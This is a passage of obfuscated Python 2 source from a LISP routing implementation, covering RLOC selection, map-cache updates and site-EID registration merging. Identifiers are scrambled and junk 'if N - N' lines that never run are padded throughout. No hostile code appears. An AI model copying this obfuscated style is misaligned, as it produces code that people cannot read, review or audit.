if ( OooO0ooO0o0OO . unreach_state ( ) and OooO0ooO0o0OO . last_rloc_probe == None ) :
OooO0ooO0o0OO . last_rloc_probe = lisp_get_timestamp ( )
if 8 - 8: ooOoO0o * IiII * OOooOOo / I1IiiI
self . best_rloc_set . append ( OooO0ooO0o0OO )
if 40 - 40: i11iIiiIii + OoooooooOO
if 2 - 2: o0oOOo0O0Ooo * OoO0O00
if 88 - 88: Oo0Ooo + oO0o + iII111i
if 51 - 51: i1IIi + i11iIiiIii * I11i / iII111i + OoooooooOO
if 89 - 89: i11iIiiIii - I1Ii111 - O0 % iIii1I11I1II1 / IiII - O0
if 63 - 63: OOooOOo
if 23 - 23: Oo0Ooo / i1IIi - OOooOOo / Oo0Ooo
if 16 - 16: o0oOOo0O0Ooo - iIii1I11I1II1 / OoooooooOO / I1ii11iIi11i + IiII
for OooO0ooO0o0OO in I1iIiI :
if ( OooO0ooO0o0OO . priority < IIii1IiI ) : continue
OooO0ooO0o0OO . delete_from_rloc_probe_list ( self . eid , self . group )
if 73 - 73: OOooOOo % I1Ii111 + OoooooooOO / I1ii11iIi11i * oO0o % oO0o
for OooO0ooO0o0OO in self . best_rloc_set :
if ( OooO0ooO0o0OO . rloc . is_null ( ) ) : continue
OooO0ooO0o0OO . add_to_rloc_probe_list ( self . eid , self . group )
if 25 - 25: I1Ii111
if 93 - 93: OoO0O00
if 62 - 62: Oo0Ooo . iII111i
def select_rloc ( self , lisp_packet , ipc_socket ) :
ii1i1II = lisp_packet . packet
iiI1IIii1IIi1 = lisp_packet . inner_version
iI1 = len ( self . best_rloc_set )
if ( iI1 is 0 ) :
self . stats . increment ( len ( ii1i1II ) )
return ( [ None , None , None , self . action , None , None ] )
if 63 - 63: OoooooooOO % I1Ii111 + IiII / OoooooooOO
if 60 - 60: II111iiii + II111iiii
i1IIIoo0ooO = 4 if lisp_load_split_pings else 0
IiI1I1i1 = lisp_packet . hash_ports ( )
if ( iiI1IIii1IIi1 == 4 ) :
for i1i1IIIIIIIi in range ( 8 + i1IIIoo0ooO ) :
IiI1I1i1 = IiI1I1i1 ^ struct . unpack ( "B" , ii1i1II [ i1i1IIIIIIIi + 12 ] ) [ 0 ]
if 40 - 40: ooOoO0o % I11i + O0
elif ( iiI1IIii1IIi1 == 6 ) :
for i1i1IIIIIIIi in range ( 0 , 32 + i1IIIoo0ooO , 4 ) :
IiI1I1i1 = IiI1I1i1 ^ struct . unpack ( "I" , ii1i1II [ i1i1IIIIIIIi + 8 : i1i1IIIIIIIi + 12 ] ) [ 0 ]
if 22 - 22: i1IIi % Oo0Ooo / oO0o % OoOoOO00 / OoOoOO00
IiI1I1i1 = ( IiI1I1i1 >> 16 ) + ( IiI1I1i1 & 0xffff )
IiI1I1i1 = ( IiI1I1i1 >> 8 ) + ( IiI1I1i1 & 0xff )
else :
for i1i1IIIIIIIi in range ( 0 , 12 + i1IIIoo0ooO , 4 ) :
IiI1I1i1 = IiI1I1i1 ^ struct . unpack ( "I" , ii1i1II [ i1i1IIIIIIIi : i1i1IIIIIIIi + 4 ] ) [ 0 ]
if 79 - 79: IiII % OoooooooOO
if 51 - 51: iII111i . oO0o % ooOoO0o % Ii1I . o0oOOo0O0Ooo
if 43 - 43: II111iiii
if ( lisp_data_plane_logging ) :
OOOOo00oo0OO = [ ]
for O0OooO0oo in self . best_rloc_set :
if ( O0OooO0oo . rloc . is_null ( ) ) : continue
OOOOo00oo0OO . append ( [ O0OooO0oo . rloc . print_address_no_iid ( ) , O0OooO0oo . print_state ( ) ] )
if 18 - 18: O0 + I1Ii111 . I1ii11iIi11i
dprint ( "Packet hash {}, index {}, best-rloc-list: {}" . format ( hex ( IiI1I1i1 ) , IiI1I1i1 % iI1 , red ( str ( OOOOo00oo0OO ) , False ) ) )
if 48 - 48: Ii1I . o0oOOo0O0Ooo * O0 / OoooooooOO + I1Ii111 + Oo0Ooo
if 92 - 92: Ii1I - o0oOOo0O0Ooo % I1IiiI + I1Ii111
if 3 - 3: iIii1I11I1II1 + i11iIiiIii
if 49 - 49: OoOoOO00 % iIii1I11I1II1 + I1Ii111
if 38 - 38: i11iIiiIii
if 75 - 75: iIii1I11I1II1 / OoO0O00 * OOooOOo % O0
OooO0ooO0o0OO = self . best_rloc_set [ IiI1I1i1 % iI1 ]
if 82 - 82: Oo0Ooo / i1IIi . i1IIi / oO0o
if 7 - 7: Oo0Ooo . iII111i % I1ii11iIi11i / iII111i
if 93 - 93: iII111i
if 5 - 5: iII111i . I11i % I11i * Ii1I - I1ii11iIi11i . i11iIiiIii
if 32 - 32: II111iiii
oOo0ooO0O0oo = lisp_get_echo_nonce ( OooO0ooO0o0OO . rloc , None )
if ( oOo0ooO0O0oo ) :
oOo0ooO0O0oo . change_state ( OooO0ooO0o0OO )
if ( OooO0ooO0o0OO . no_echoed_nonce_state ( ) ) :
oOo0ooO0O0oo . request_nonce_sent = None
if 58 - 58: I1IiiI - o0oOOo0O0Ooo - I1Ii111 . O0 % OoO0O00 . I11i
if 41 - 41: iII111i . I1Ii111 - IiII / O0
if 62 - 62: IiII * I1ii11iIi11i * iII111i * OoOoOO00
if 12 - 12: Oo0Ooo * Ii1I / ooOoO0o % I11i % O0
if 25 - 25: Oo0Ooo * oO0o
if 78 - 78: OoOoOO00 / II111iiii
if ( OooO0ooO0o0OO . up_state ( ) == False ) :
i1IoO00oo = IiI1I1i1 % iI1
OO000o00 = ( i1IoO00oo + 1 ) % iI1
while ( OO000o00 != i1IoO00oo ) :
OooO0ooO0o0OO = self . best_rloc_set [ OO000o00 ]
if ( OooO0ooO0o0OO . up_state ( ) ) : break
OO000o00 = ( OO000o00 + 1 ) % iI1
if 36 - 36: OoO0O00 . ooOoO0o . O0 / OoO0O00
if ( OO000o00 == i1IoO00oo ) :
self . build_best_rloc_set ( )
return ( [ None , None , None , None , None , None ] )
if 50 - 50: Ii1I . OoOoOO00 * o0oOOo0O0Ooo
if 68 - 68: IiII * oO0o / OoOoOO00 / I1Ii111
if 72 - 72: I1ii11iIi11i
if 74 - 74: I1Ii111 * iIii1I11I1II1 / oO0o - IiII - I1IiiI
if 84 - 84: iIii1I11I1II1 % Oo0Ooo / I1ii11iIi11i + o0oOOo0O0Ooo * II111iiii
if 81 - 81: I1IiiI / I1ii11iIi11i / OOooOOo
OooO0ooO0o0OO . stats . increment ( len ( ii1i1II ) )
if 89 - 89: Oo0Ooo % IiII
if 36 - 36: IiII % OoOoOO00 % I1ii11iIi11i
if 7 - 7: I1ii11iIi11i % OoOoOO00 - O0 . I1Ii111
if 9 - 9: Ii1I . OoooooooOO / ooOoO0o + i1IIi
if ( OooO0ooO0o0OO . rle_name and OooO0ooO0o0OO . rle == None ) :
if ( lisp_rle_list . has_key ( OooO0ooO0o0OO . rle_name ) ) :
OooO0ooO0o0OO . rle = lisp_rle_list [ OooO0ooO0o0OO . rle_name ]
if 90 - 90: oO0o - OoOoOO00 % ooOoO0o
if 83 - 83: OOooOOo - I1ii11iIi11i + OoO0O00
if ( OooO0ooO0o0OO . rle ) : return ( [ None , None , None , None , OooO0ooO0o0OO . rle , None ] )
if 99 - 99: iII111i - OoOoOO00 % ooOoO0o
if 27 - 27: oO0o . oO0o * iII111i % iIii1I11I1II1
if 81 - 81: iII111i * II111iiii
if 28 - 28: i11iIiiIii . Oo0Ooo . Ii1I
if ( OooO0ooO0o0OO . elp and OooO0ooO0o0OO . elp . use_elp_node ) :
return ( [ OooO0ooO0o0OO . elp . use_elp_node . address , None , None , None , None ,
None ] )
if 19 - 19: OoO0O00 - Ii1I + ooOoO0o + OOooOOo
if 84 - 84: iII111i / Oo0Ooo
if 21 - 21: OoO0O00 . I1IiiI - OoO0O00
if 51 - 51: iIii1I11I1II1
if 5 - 5: oO0o - OoOoOO00 . ooOoO0o
O0O0oO0o0 = None if ( OooO0ooO0o0OO . rloc . is_null ( ) ) else OooO0ooO0o0OO . rloc
IIi1I1iII111 = OooO0ooO0o0OO . translated_port
Ii1II1I = self . action if ( O0O0oO0o0 == None ) else None
if 59 - 59: II111iiii % Oo0Ooo * OoOoOO00 + i11iIiiIii . OoO0O00
if 70 - 70: o0oOOo0O0Ooo * O0 * II111iiii
if 38 - 38: OoO0O00 - I1IiiI * OoooooooOO / I11i . O0
if 77 - 77: OOooOOo + oO0o * iIii1I11I1II1 / oO0o / OOooOOo . i11iIiiIii
if 92 - 92: Oo0Ooo . o0oOOo0O0Ooo % OoooooooOO * i11iIiiIii * OoO0O00 * o0oOOo0O0Ooo
OO00OO = None
if ( oOo0ooO0O0oo and oOo0ooO0O0oo . request_nonce_timeout ( ) == False ) :
OO00OO = oOo0ooO0O0oo . get_request_or_echo_nonce ( ipc_socket , O0O0oO0o0 )
if 48 - 48: iII111i * I1ii11iIi11i * oO0o % O0 . OoO0O00
if 11 - 11: OOooOOo / o0oOOo0O0Ooo
if 98 - 98: oO0o + I11i . oO0o
if 10 - 10: iII111i + i1IIi . I11i % ooOoO0o / ooOoO0o
if 86 - 86: Oo0Ooo
return ( [ O0O0oO0o0 , IIi1I1iII111 , OO00OO , Ii1II1I , None , OooO0ooO0o0OO ] )
if 7 - 7: iIii1I11I1II1
if 86 - 86: IiII + iII111i * II111iiii - IiII - o0oOOo0O0Ooo
def do_rloc_sets_match ( self , rloc_address_set ) :
if ( len ( self . rloc_set ) != len ( rloc_address_set ) ) : return ( False )
if 8 - 8: OOooOOo . Ii1I
if 15 - 15: ooOoO0o / OOooOOo + i1IIi / Ii1I / OOooOOo
if 47 - 47: Oo0Ooo + oO0o % OoooooooOO
if 23 - 23: I1Ii111 / i11iIiiIii - ooOoO0o * iII111i - Ii1I . iIii1I11I1II1
if 11 - 11: I11i % OoOoOO00 * Oo0Ooo
for IiIIIi in self . rloc_set :
for OooO0ooO0o0OO in rloc_address_set :
if ( OooO0ooO0o0OO . is_exact_match ( IiIIIi . rloc ) == False ) : continue
OooO0ooO0o0OO = None
break
if 48 - 48: OOooOOo
if ( OooO0ooO0o0OO == rloc_address_set [ - 1 ] ) : return ( False )
if 66 - 66: iII111i - I1Ii111 - i11iIiiIii . o0oOOo0O0Ooo + Oo0Ooo
return ( True )
if 90 - 90: O0 - i11iIiiIii * ooOoO0o . I1ii11iIi11i . Ii1I - OoooooooOO
if 23 - 23: o0oOOo0O0Ooo
def get_rloc ( self , rloc ) :
for IiIIIi in self . rloc_set :
O0OooO0oo = IiIIIi . rloc
if ( rloc . is_exact_match ( O0OooO0oo ) ) : return ( IiIIIi )
if 88 - 88: I1Ii111 + iIii1I11I1II1 / o0oOOo0O0Ooo
return ( None )
if 93 - 93: ooOoO0o % iIii1I11I1II1 - OOooOOo . IiII + ooOoO0o
if 63 - 63: I1ii11iIi11i / OOooOOo
def get_rloc_by_interface ( self , interface ) :
for IiIIIi in self . rloc_set :
if ( IiIIIi . interface == interface ) : return ( IiIIIi )
if 28 - 28: I11i / I1Ii111 + IiII * OoooooooOO - iIii1I11I1II1
return ( None )
if 6 - 6: I11i % o0oOOo0O0Ooo / OoooooooOO . I1Ii111
if 17 - 17: I1ii11iIi11i + OoooooooOO / iIii1I11I1II1 . II111iiii + Oo0Ooo
def add_db ( self ) :
if ( self . group . is_null ( ) ) :
lisp_db_for_lookups . add_cache ( self . eid , self )
else :
o00o0oOo0o0O = lisp_db_for_lookups . lookup_cache ( self . group , True )
if ( o00o0oOo0o0O == None ) :
o00o0oOo0o0O = lisp_mapping ( self . group , self . group , [ ] )
lisp_db_for_lookups . add_cache ( self . group , o00o0oOo0o0O )
if 7 - 7: O0 - I1ii11iIi11i - iIii1I11I1II1
o00o0oOo0o0O . add_source_entry ( self )
if 96 - 96: OoOoOO00 . I1IiiI . I11i * OoooooooOO + OoooooooOO * O0
if 90 - 90: I11i + I1ii11iIi11i + OoooooooOO + OoOoOO00 + IiII / iII111i
if 75 - 75: i11iIiiIii
def add_cache ( self , do_ipc = True ) :
if ( self . group . is_null ( ) ) :
lisp_map_cache . add_cache ( self . eid , self )
if ( lisp_program_hardware ) : lisp_program_vxlan_hardware ( self )
else :
OoOoooooO00oo = lisp_map_cache . lookup_cache ( self . group , True )
if ( OoOoooooO00oo == None ) :
OoOoooooO00oo = lisp_mapping ( self . group , self . group , [ ] )
OoOoooooO00oo . eid . copy_address ( self . group )
OoOoooooO00oo . group . copy_address ( self . group )
lisp_map_cache . add_cache ( self . group , OoOoooooO00oo )
if 27 - 27: I11i - IiII - I1Ii111
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( OoOoooooO00oo . group )
OoOoooooO00oo . add_source_entry ( self )
if 90 - 90: OoO0O00 . oO0o * O0 / I11i % O0 + I1Ii111
if ( do_ipc ) : lisp_write_ipc_map_cache ( True , self )
if 48 - 48: iIii1I11I1II1 . i11iIiiIii / OoooooooOO . i1IIi . o0oOOo0O0Ooo
if 84 - 84: Ii1I
def delete_cache ( self ) :
self . delete_rlocs_from_rloc_probe_list ( )
lisp_write_ipc_map_cache ( False , self )
if 92 - 92: I11i
if ( self . group . is_null ( ) ) :
lisp_map_cache . delete_cache ( self . eid )
if ( lisp_program_hardware ) :
O000 = self . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( O000 ) )
if 79 - 79: O0 / IiII . i1IIi - i1IIi + i1IIi
else :
OoOoooooO00oo = lisp_map_cache . lookup_cache ( self . group , True )
if ( OoOoooooO00oo == None ) : return
if 47 - 47: iII111i - I1Ii111 - I1Ii111 . ooOoO0o
iII1oO0OOoOOo0 = OoOoooooO00oo . lookup_source_cache ( self . eid , True )
if ( iII1oO0OOoOOo0 == None ) : return
if 53 - 53: iII111i + oO0o % O0
OoOoooooO00oo . source_cache . delete_cache ( self . eid )
if ( OoOoooooO00oo . source_cache . cache_size ( ) == 0 ) :
lisp_map_cache . delete_cache ( self . group )
if 92 - 92: O0 / iIii1I11I1II1
if 72 - 72: o0oOOo0O0Ooo / iII111i - I1ii11iIi11i . II111iiii
if 95 - 95: II111iiii / I11i / ooOoO0o - I1Ii111 % i11iIiiIii
if 53 - 53: iII111i
def add_source_entry ( self , source_mc ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_mc . eid , source_mc )
if 45 - 45: OOooOOo * I1IiiI / oO0o . Ii1I - OoO0O00 % OOooOOo
if 40 - 40: I11i
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 69 - 69: OoOoOO00 + OoOoOO00 + o0oOOo0O0Ooo / iIii1I11I1II1 * OoO0O00
if 44 - 44: II111iiii / o0oOOo0O0Ooo
def dynamic_eid_configured ( self ) :
return ( self . dynamic_eids != None )
if 81 - 81: I1Ii111 . Ii1I * ooOoO0o . IiII - OoOoOO00
if 79 - 79: ooOoO0o - O0
def star_secondary_iid ( self , prefix ) :
if ( self . secondary_iid == None ) : return ( prefix )
oOo00Ooo0o0 = "," + str ( self . secondary_iid )
return ( prefix . replace ( oOo00Ooo0o0 , oOo00Ooo0o0 + "*" ) )
if 56 - 56: ooOoO0o
if 89 - 89: O0 % iIii1I11I1II1 / OoOoOO00 - I1Ii111 - I1IiiI
def increment_decap_stats ( self , packet ) :
IIi1I1iII111 = packet . udp_dport
if ( IIi1I1iII111 == LISP_DATA_PORT ) :
OooO0ooO0o0OO = self . get_rloc ( packet . outer_dest )
else :
if 60 - 60: IiII % i11iIiiIii / OOooOOo
if 43 - 43: i11iIiiIii * II111iiii + ooOoO0o - OoooooooOO * II111iiii / OoO0O00
if 92 - 92: O0 - ooOoO0o % iII111i
if 83 - 83: I1ii11iIi11i / OoOoOO00 % OoooooooOO
for OooO0ooO0o0OO in self . rloc_set :
if ( OooO0ooO0o0OO . translated_port != 0 ) : break
if 54 - 54: I11i / I1IiiI * IiII - iII111i
if 37 - 37: i1IIi * I1Ii111 / I11i * II111iiii + OoooooooOO . OoO0O00
if ( OooO0ooO0o0OO != None ) : OooO0ooO0o0OO . stats . increment ( len ( packet . packet ) )
self . stats . increment ( len ( packet . packet ) )
if 22 - 22: OoOoOO00 + OoooooooOO - I1Ii111
if 82 - 82: Ii1I % I1Ii111 / ooOoO0o
def rtrs_in_rloc_set ( self ) :
for OooO0ooO0o0OO in self . rloc_set :
if ( OooO0ooO0o0OO . is_rtr ( ) ) : return ( True )
if 86 - 86: II111iiii - iIii1I11I1II1 + oO0o + I1IiiI
return ( False )
if 29 - 29: Ii1I % OoooooooOO * II111iiii
if 88 - 88: I1Ii111 + I11i + I1Ii111 % OoO0O00 / I1ii11iIi11i - I11i
if 15 - 15: Oo0Ooo - i1IIi
class lisp_dynamic_eid ( ) :
def __init__ ( self ) :
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . interface = None
self . last_packet = None
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 87 - 87: O0 . o0oOOo0O0Ooo % OOooOOo / I11i - I1Ii111 % i11iIiiIii
if 3 - 3: oO0o + iII111i + OOooOOo
def get_timeout ( self , interface ) :
try :
OoOOO0 = lisp_myinterfaces [ interface ]
self . timeout = OoOOO0 . dynamic_eid_timeout
except :
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 25 - 25: iII111i % iII111i * ooOoO0o % I1ii11iIi11i % I1Ii111
if 4 - 4: O0 % i11iIiiIii % I1Ii111 - i11iIiiIii / o0oOOo0O0Ooo % o0oOOo0O0Ooo
if 59 - 59: i1IIi . o0oOOo0O0Ooo . IiII + iII111i * i1IIi
if 41 - 41: ooOoO0o - i1IIi * IiII . OoOoOO00 % iIii1I11I1II1 - IiII
class lisp_group_mapping ( ) :
def __init__ ( self , group_name , ms_name , group_prefix , sources , rle_addr ) :
self . group_name = group_name
self . group_prefix = group_prefix
self . use_ms_name = ms_name
self . sources = sources
self . rle_address = rle_addr
if 12 - 12: I1ii11iIi11i * iII111i / i11iIiiIii / OoOoOO00
if 62 - 62: O0 - IiII + I1ii11iIi11i
def add_group ( self ) :
lisp_group_mapping_list [ self . group_name ] = self
if 67 - 67: i1IIi + i11iIiiIii * I1ii11iIi11i / ooOoO0o * OoO0O00
if 52 - 52: II111iiii / Ii1I - iII111i
if 33 - 33: I1IiiI
if 41 - 41: OoOoOO00 * i1IIi
if 94 - 94: I11i
if 28 - 28: OOooOOo
if 82 - 82: II111iiii
if 66 - 66: iII111i % I1Ii111 * oO0o
if 81 - 81: i11iIiiIii - O0 . iIii1I11I1II1 - I11i + iIii1I11I1II1
if 50 - 50: Oo0Ooo . OoO0O00 + i11iIiiIii / i11iIiiIii
def lisp_is_group_more_specific ( group_str , group_mapping ) :
oOo00Ooo0o0 = group_mapping . group_prefix . instance_id
Ooo0o00 = group_mapping . group_prefix . mask_len
oOoooOOO0o0 = lisp_address ( LISP_AFI_IPV4 , group_str , 32 , oOo00Ooo0o0 )
if ( oOoooOOO0o0 . is_more_specific ( group_mapping . group_prefix ) ) : return ( Ooo0o00 )
return ( - 1 )
if 27 - 27: OoOoOO00 - OoOoOO00 % II111iiii + i1IIi + I1IiiI
if 75 - 75: OoooooooOO . I11i - OoOoOO00
if 93 - 93: OoOoOO00 . I1Ii111 % I1ii11iIi11i
if 58 - 58: OoooooooOO . i1IIi . Oo0Ooo - o0oOOo0O0Ooo / oO0o * I1Ii111
if 6 - 6: oO0o - OoO0O00
if 44 - 44: Oo0Ooo + I1ii11iIi11i % Oo0Ooo / I11i
if 57 - 57: Oo0Ooo + Ii1I * OoooooooOO
def lisp_lookup_group ( group ) :
OOOOo00oo0OO = None
for i1IiiiII1ii1I1 in lisp_group_mapping_list . values ( ) :
Ooo0o00 = lisp_is_group_more_specific ( group , i1IiiiII1ii1I1 )
if ( Ooo0o00 == - 1 ) : continue
if ( OOOOo00oo0OO == None or Ooo0o00 > OOOOo00oo0OO . group_prefix . mask_len ) : OOOOo00oo0OO = i1IiiiII1ii1I1
if 5 - 5: OoooooooOO / o0oOOo0O0Ooo
return ( OOOOo00oo0OO )
if 14 - 14: OOooOOo * Oo0Ooo - o0oOOo0O0Ooo + iIii1I11I1II1 / ooOoO0o % iIii1I11I1II1
if 4 - 4: OoOoOO00 / Oo0Ooo - OoO0O00 . OoOoOO00 / I1Ii111
lisp_site_flags = {
"P" : "ETR is {}Requesting Map-Server to Proxy Map-Reply" ,
"S" : "ETR is {}LISP-SEC capable" ,
"I" : "xTR-ID and site-ID are {}included in Map-Register" ,
"T" : "Use Map-Register TTL field to timeout registration is {}set" ,
"R" : "Merging registrations are {}requested" ,
"M" : "ETR is {}a LISP Mobile-Node" ,
"N" : "ETR is {}requesting Map-Notify messages from Map-Server"
}
if 60 - 60: OOooOOo * I1Ii111
class lisp_site ( ) :
def __init__ ( self ) :
self . site_name = ""
self . description = ""
self . shutdown = False
self . auth_sha1_or_sha2 = False
self . auth_key = { }
self . encryption_key = None
self . allowed_prefixes = { }
self . allowed_prefixes_sorted = [ ]
self . allowed_rlocs = { }
self . map_notifies_sent = 0
self . map_notify_acks_received = 0
if 17 - 17: iII111i * I11i / iIii1I11I1II1 - II111iiii
if 97 - 97: II111iiii * o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo . II111iiii
class lisp_site_eid ( ) :
def __init__ ( self , site ) :
self . site = site
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . first_registered = 0
self . last_registered = 0
self . last_registerer = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self . registered = False
self . registered_rlocs = [ ]
self . auth_sha1_or_sha2 = False
self . individual_registrations = { }
self . map_registers_received = 0
self . proxy_reply_requested = False
self . force_proxy_reply = False
self . force_nat_proxy_reply = False
self . force_ttl = None
self . pitr_proxy_reply_drop = False
self . proxy_reply_action = ""
self . lisp_sec_present = False
self . map_notify_requested = False
self . mobile_node_requested = False
self . echo_nonce_capable = False
self . use_register_ttl_requested = False
self . merge_register_requested = False
self . xtr_id_present = False
self . xtr_id = 0
self . site_id = 0
self . accept_more_specifics = False
self . parent_for_more_specifics = None
self . dynamic = False
self . more_specific_registrations = [ ]
self . source_cache = None
self . inconsistent_registration = False
self . policy = None
self . require_signature = False
if 76 - 76: II111iiii + I1Ii111 . OoooooooOO / IiII % i11iIiiIii
if 87 - 87: Ii1I / OoOoOO00 / OOooOOo
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 11 - 11: o0oOOo0O0Ooo * OoO0O00 . o0oOOo0O0Ooo - I1IiiI / IiII - OOooOOo
if 19 - 19: i1IIi + IiII . OoO0O00 / O0 - I1Ii111 - Oo0Ooo
def print_flags ( self , html ) :
if ( html == False ) :
o0OooooOoOO = "{}-{}-{}-{}-{}-{}-{}" . format ( "P" if self . proxy_reply_requested else "p" ,
# Oo0Ooo / iII111i
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_register_ttl_requested else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node_requested else "m" ,
"N" if self . map_notify_requested else "n" )
else :
iIiI1 = self . print_flags ( False )
iIiI1 = iIiI1 . split ( "-" )
o0OooooOoOO = ""
for iIIii1IiIIiI in iIiI1 :
iiI = lisp_site_flags [ iIIii1IiIIiI . upper ( ) ]
iiI = iiI . format ( "" if iIIii1IiIIiI . isupper ( ) else "not " )
o0OooooOoOO += lisp_span ( iIIii1IiIIiI , iiI )
if ( iIIii1IiIIiI . lower ( ) != "n" ) : o0OooooOoOO += "-"
if 76 - 76: iII111i - II111iiii % Oo0Ooo . I1Ii111
if 64 - 64: OoO0O00 - OoO0O00
return ( o0OooooOoOO )
if 93 - 93: Oo0Ooo . O0
if 75 - 75: iII111i * II111iiii - I1IiiI
def copy_state_to_parent ( self , child ) :
self . xtr_id = child . xtr_id
self . site_id = child . site_id
self . first_registered = child . first_registered
self . last_registered = child . last_registered
self . last_registerer = child . last_registerer
self . register_ttl = child . register_ttl
if ( self . registered == False ) :
self . first_registered = lisp_get_timestamp ( )
if 30 - 30: i1IIi / ooOoO0o . ooOoO0o
self . auth_sha1_or_sha2 = child . auth_sha1_or_sha2
self . registered = child . registered
self . proxy_reply_requested = child . proxy_reply_requested
self . lisp_sec_present = child . lisp_sec_present
self . xtr_id_present = child . xtr_id_present
self . use_register_ttl_requested = child . use_register_ttl_requested
self . merge_register_requested = child . merge_register_requested
self . mobile_node_requested = child . mobile_node_requested
self . map_notify_requested = child . map_notify_requested
if 22 - 22: I11i % iIii1I11I1II1 - i11iIiiIii * OoOoOO00 - I1Ii111
if 97 - 97: i11iIiiIii . OoOoOO00 + oO0o * O0 % OoO0O00 - Ii1I
def build_sort_key ( self ) :
i11II111IiIiI = lisp_cache ( )
O0ooOo , iII1 = i11II111IiIiI . build_key ( self . eid )
oOo0oOoOo0O = ""
if ( self . group . is_null ( ) == False ) :
iiii , oOo0oOoOo0O = i11II111IiIiI . build_key ( self . group )
oOo0oOoOo0O = "-" + oOo0oOoOo0O [ 0 : 12 ] + "-" + str ( iiii ) + "-" + oOo0oOoOo0O [ 12 : : ]
if 53 - 53: IiII / I1IiiI / i1IIi
iII1 = iII1 [ 0 : 12 ] + "-" + str ( O0ooOo ) + "-" + iII1 [ 12 : : ] + oOo0oOoOo0O
del ( i11II111IiIiI )
return ( iII1 )
if 49 - 49: i11iIiiIii % I1IiiI % I1Ii111 / I1ii11iIi11i - i11iIiiIii . i1IIi
if 84 - 84: i11iIiiIii
def merge_in_site_eid ( self , child ) :
OO0O0O = False
if ( self . group . is_null ( ) ) :
self . merge_rlocs_in_site_eid ( )
else :
OO0O0O = self . merge_rles_in_site_eid ( )
if 51 - 51: Oo0Ooo + I1IiiI
if 63 - 63: I11i
if 90 - 90: I1Ii111 * OoooooooOO . iIii1I11I1II1 % OoO0O00 / I11i + iII111i
if 63 - 63: o0oOOo0O0Ooo . IiII . Oo0Ooo - iIii1I11I1II1 / I1Ii111
if 66 - 66: ooOoO0o * I1Ii111 - II111iiii
if 38 - 38: O0 % I1ii11iIi11i + O0
if ( child != None ) :
self . copy_state_to_parent ( child )
self . map_registers_received += 1
if 37 - 37: Oo0Ooo / I1IiiI
return ( OO0O0O )
if 23 - 23: II111iiii / iII111i
if 55 - 55: i11iIiiIii - Ii1I % OoooooooOO * OoooooooOO
def copy_rloc_records ( self ) :
oO0iII1IIii1iii = [ ]
for IiIIIi in self . registered_rlocs :
oO0iII1IIii1iii . append ( copy . deepcopy ( IiIIIi ) )
if 98 - 98: II111iiii % I1Ii111
return ( oO0iII1IIii1iii )
if 64 - 64: I11i
if 26 - 26: ooOoO0o * I11i + OOooOOo * i1IIi
def merge_rlocs_in_site_eid ( self ) :
self . registered_rlocs = [ ]
for O0oiiii1i1i11I in self . individual_registrations . values ( ) :
if ( self . site_id != O0oiiii1i1i11I . site_id ) : continue
if ( O0oiiii1i1i11I . registered == False ) : continue
self . registered_rlocs += O0oiiii1i1i11I . copy_rloc_records ( )
if 48 - 48: o0oOOo0O0Ooo - I1ii11iIi11i / iII111i
if 63 - 63: O0 - IiII . OOooOOo % IiII . I1IiiI / oO0o
if 79 - 79: OoOoOO00
if 88 - 88: oO0o * o0oOOo0O0Ooo
if 5 - 5: I11i - I1Ii111 * I11i - II111iiii + OOooOOo + II111iiii
if 91 - 91: i1IIi + Oo0Ooo - I1ii11iIi11i + I1ii11iIi11i * O0 / O0
oO0iII1IIii1iii = [ ]
for IiIIIi in self . registered_rlocs :
if ( IiIIIi . rloc . is_null ( ) or len ( oO0iII1IIii1iii ) == 0 ) :
oO0iII1IIii1iii . append ( IiIIIi )
continue
if 78 - 78: OoooooooOO
for II1IIii1 in oO0iII1IIii1iii :
if ( II1IIii1 . rloc . is_null ( ) ) : continue
if ( IiIIIi . rloc . is_exact_match ( II1IIii1 . rloc ) ) : break
if 73 - 73: o0oOOo0O0Ooo + OoooooooOO - I1Ii111 . iIii1I11I1II1
if ( II1IIii1 == oO0iII1IIii1iii [ - 1 ] ) : oO0iII1IIii1iii . append ( IiIIIi )
if 25 - 25: OoooooooOO % I1ii11iIi11i % Oo0Ooo % i11iIiiIii
self . registered_rlocs = oO0iII1IIii1iii
if 8 - 8: O0 - O0 % Ii1I
if 22 - 22: OoOoOO00
if 85 - 85: II111iiii - II111iiii
if 95 - 95: II111iiii + II111iiii + iII111i
if ( len ( self . registered_rlocs ) == 0 ) : self . registered = False
return
if 38 - 38: OoO0O00 * Ii1I * O0 / I1IiiI
if 99 - 99: Oo0Ooo + ooOoO0o - I1ii11iIi11i + I1Ii111 + Ii1I * I1IiiI
def merge_rles_in_site_eid ( self ) :
if 68 - 68: OoO0O00
if 79 - 79: Ii1I . IiII + OoOoOO00
if 10 - 10: OoooooooOO * iII111i * ooOoO0o . Ii1I % I1Ii111 / I1ii11iIi11i
if 71 - 71: Ii1I + IiII
IiiI1I1iIii = { }
for IiIIIi in self . registered_rlocs :
if ( IiIIIi . rle == None ) : continue
for Oo0000O00o0 in IiIIIi . rle . rle_nodes :
O0o00o000oO = Oo0000O00o0 . address . print_address_no_iid ( )
IiiI1I1iIii [ O0o00o000oO ] = Oo0000O00o0 . address
if 79 - 79: Oo0Ooo % oO0o . oO0o . o0oOOo0O0Ooo + I1IiiI - I1ii11iIi11i
break
if 8 - 8: I1ii11iIi11i
if 50 - 50: o0oOOo0O0Ooo - O0 - II111iiii + OOooOOo - OoOoOO00 + OoO0O00
if 33 - 33: o0oOOo0O0Ooo % OoOoOO00 + iII111i
if 54 - 54: OoO0O00
if 18 - 18: I1Ii111 - Oo0Ooo
self . merge_rlocs_in_site_eid ( )
